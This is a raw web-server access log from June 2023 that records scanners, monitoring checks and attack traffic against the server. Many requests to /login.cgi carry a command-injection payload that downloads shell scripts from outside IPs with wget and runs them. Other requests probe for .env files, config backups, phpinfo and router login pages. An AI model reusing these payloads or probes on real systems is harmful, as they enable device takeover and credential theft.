94.102.61.10 - - [02/Jun/2023:04:47:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
66.175.213.4 - - [02/Jun/2023:04:48:31 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.200 - - [02/Jun/2023:04:48:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
45.33.80.243 - - [02/Jun/2023:04:48:45 +0200] "\x16\x03\x01" 501 318 "-" "-"
64.62.197.206 - - [02/Jun/2023:04:50:21 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"
109.205.213.39 - - [02/Jun/2023:04:50:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
64.62.197.207 - - [02/Jun/2023:04:51:22 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0"
185.177.57.157 - - [02/Jun/2023:04:52:08 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.80:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
74.82.47.5 - - [02/Jun/2023:04:53:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
45.79.181.223 - - [02/Jun/2023:04:54:44 +0200] "\x16\x03\x01" 501 318 "-" "-"
74.82.47.5 - - [02/Jun/2023:04:55:47 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.41"
128.1.248.26 - - [02/Jun/2023:04:57:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
74.82.47.5 - - [02/Jun/2023:04:58:00 +0200] "GET /geoserver/web/ HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36"
205.210.31.233 - - [02/Jun/2023:04:58:00 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
185.177.57.157 - - [02/Jun/2023:05:02:55 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.85:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
109.205.213.106 - - [02/Jun/2023:05:04:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
66.175.213.4 - - [02/Jun/2023:05:05:36 +0200] "\x16\x03\x01" 501 318 "-" "-"
35.203.210.239 - - [02/Jun/2023:05:07:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
162.216.150.184 - - [02/Jun/2023:05:08:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
45.79.181.251 - - [02/Jun/2023:05:09:06 +0200] "\x16\x03\x01" 501 318 "-" "-"
128.14.141.34 - - [02/Jun/2023:05:09:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
45.33.80.243 - - [02/Jun/2023:05:10:51 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.43 - - [02/Jun/2023:05:11:08 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.106 - - [02/Jun/2023:05:16:14 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
172.105.128.13 - - [02/Jun/2023:05:19:23 +0200] "\x16\x03\x01" 501 318 "-" "-"
109.205.213.5 - - [02/Jun/2023:05:21:54 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.5 - - [02/Jun/2023:05:28:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.66.230.201 - - [02/Jun/2023:05:28:28 +0200] "" 501 315 "-" "-"
80.66.88.211 - - [02/Jun/2023:05:29:05 +0200] "\x03" 501 316 "-" "-"
51.254.59.113 - - [02/Jun/2023:05:31:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
109.205.213.5 - - [02/Jun/2023:05:32:06 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.10 - - [02/Jun/2023:05:34:53 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
193.106.29.122 - - [02/Jun/2023:05:35:35 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
198.98.53.159 - - [02/Jun/2023:05:38:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:05:39:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
203.217.115.226 - - [02/Jun/2023:05:40:14 +0200] "POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1" 400 406 "-" "-"
154.26.135.81 - - [02/Jun/2023:05:40:58 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
104.199.31.214 - - [02/Jun/2023:05:40:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
154.26.135.81 - - [02/Jun/2023:05:41:05 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:05:41:09 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
222.110.198.89 - - [02/Jun/2023:05:41:10 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
154.26.135.81 - - [02/Jun/2023:05:41:12 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:05:41:15 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
107.6.112.252 - - [02/Jun/2023:05:44:13 +0200] "\x16\x03\x01" 501 318 "-" "-"
128.14.141.34 - - [02/Jun/2023:05:45:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
107.6.112.252 - - [02/Jun/2023:05:46:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36"
109.205.213.43 - - [02/Jun/2023:05:48:18 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.103 - - [02/Jun/2023:05:48:22 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
35.187.98.121 - - [02/Jun/2023:05:50:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
109.205.213.4 - - [02/Jun/2023:05:55:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
34.79.162.186 - - [02/Jun/2023:05:57:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
104.199.31.214 - - [02/Jun/2023:05:57:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
157.245.66.13 - - [02/Jun/2023:06:02:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.66.13 - - [02/Jun/2023:06:02:56 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.66.13 - - [02/Jun/2023:06:02:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.66.13 - - [02/Jun/2023:06:02:56 +0200] "GET /client/get_targets HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.66.13 - - [02/Jun/2023:06:02:56 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
157.245.66.13 - - [02/Jun/2023:06:02:57 +0200] "\x16\x03\x01" 501 318 "-" "-"
157.245.66.13 - - [02/Jun/2023:06:02:57 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.66.13 - - [02/Jun/2023:06:02:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Mobile/15E148 Snapchat/10.77.0.54 (like Safari/604.1)"
157.245.66.13 - - [02/Jun/2023:06:02:57 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.66.13 - - [02/Jun/2023:06:02:57 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
157.245.66.13 - - [02/Jun/2023:06:02:57 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
109.205.213.39 - - [02/Jun/2023:06:04:38 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
34.140.130.61 - - [02/Jun/2023:06:04:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.28.2"
109.205.213.39 - - [02/Jun/2023:06:06:53 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
185.177.57.157 - - [02/Jun/2023:06:07:21 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.89:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
193.106.29.122 - - [02/Jun/2023:06:08:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
109.205.213.103 - - [02/Jun/2023:06:14:45 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.108 - - [02/Jun/2023:06:14:59 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
109.205.213.41 - - [02/Jun/2023:06:16:51 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
45.66.230.201 - - [02/Jun/2023:06:21:33 +0200] "" 501 315 "-" "-"
45.66.230.201 - - [02/Jun/2023:06:25:44 +0200] "" 501 315 "-" "-"
80.66.88.204 - - [02/Jun/2023:06:28:46 +0200] "\x03" 501 316 "-" "-"
185.177.57.157 - - [02/Jun/2023:06:32:55 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 328 "http://212.91.246.86:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
205.210.31.44 - - [02/Jun/2023:06:34:05 +0200] "\x16\x03\x01" 501 318 "-" "-"
193.106.29.122 - - [02/Jun/2023:06:35:53 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
222.110.198.89 - - [02/Jun/2023:06:36:04 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.98.53.159 - - [02/Jun/2023:06:39:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
126.77.206.93 - - [02/Jun/2023:06:41:11 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://192.210.162.147/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
198.98.53.159 - - [02/Jun/2023:06:41:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:41:46 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:43:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:43:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:44:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:44:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:45:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
198.98.53.159 - - [02/Jun/2023:06:46:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
154.26.135.81 - - [02/Jun/2023:06:48:17 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 322 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:17 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:06:48:18 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:19 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:19 +0200] "POST /tool/view/phpinfo.view.php HTTP/1.1" 404 331 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:20 +0200] "POST /wp-config.php-backup HTTP/1.1" 404 325 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:20 +0200] "POST /%C0 HTTP/1.1" 404 306 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:21 +0200] "POST /debug/default/view.html HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:23 +0200] "POST /debug/default/view HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:23 +0200] "POST /frontend/web/debug/default/view HTTP/1.1" 404 336 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:24 +0200] "POST /web/debug/default/view HTTP/1.1" 404 327 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:24 +0200] "POST /sapi/debug/default/view HTTP/1.1" 404 328 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:06:48:25 +0200] "POST /debug/default/view?panel=config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
188.26.206.150 - - [02/Jun/2023:06:48:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
162.221.192.26 - - [02/Jun/2023:06:48:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
193.106.29.122 - - [02/Jun/2023:06:50:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
205.210.31.87 - - [02/Jun/2023:06:50:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.98.53.159 - - [02/Jun/2023:06:52:22 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
45.66.230.201 - - [02/Jun/2023:06:52:39 +0200] "" 501 315 "-" "-"
193.106.29.122 - - [02/Jun/2023:06:59:47 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [02/Jun/2023:07:00:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:01:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.38 - - [02/Jun/2023:07:02:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [02/Jun/2023:07:02:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.105 - - [02/Jun/2023:07:02:23 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [02/Jun/2023:07:03:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:04:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:05:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:06:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:07:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:08:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:09:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
154.26.135.81 - - [02/Jun/2023:07:10:04 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:07:10:07 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:07:10:09 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36"
154.26.135.81 - - [02/Jun/2023:07:10:10 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
154.26.135.81 - - [02/Jun/2023:07:10:12 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
212.91.246.72 - - [02/Jun/2023:07:10:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:11:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.49 - - [02/Jun/2023:07:11:19 +0200] "\x03" 501 316 "-" "-"
212.91.246.72 - - [02/Jun/2023:07:12:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:13:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.110.32.156 - - [02/Jun/2023:07:13:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
212.91.246.72 - - [02/Jun/2023:07:14:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.106.29.122 - - [02/Jun/2023:07:14:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0"
212.91.246.72 - - [02/Jun/2023:07:15:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.25.108.194 - - [02/Jun/2023:07:16:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Jun/2023:07:16:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:17:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.14.133.58 - - [02/Jun/2023:07:17:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
128.14.133.58 - - [02/Jun/2023:07:17:54 +0200] "GET /showLogin.cc HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Jun/2023:07:18:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:19:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:20:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:21:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:22:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:23:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:24:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:25:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Jun/2023:07:26:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.205.213.10 - - [02/Jun/2023:07:26:25 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.213.7/8UsA.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 329 "-" "r00ts3c-owned-you"
212.91.246.72 - - [02/Jun/2023:07:27:14 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
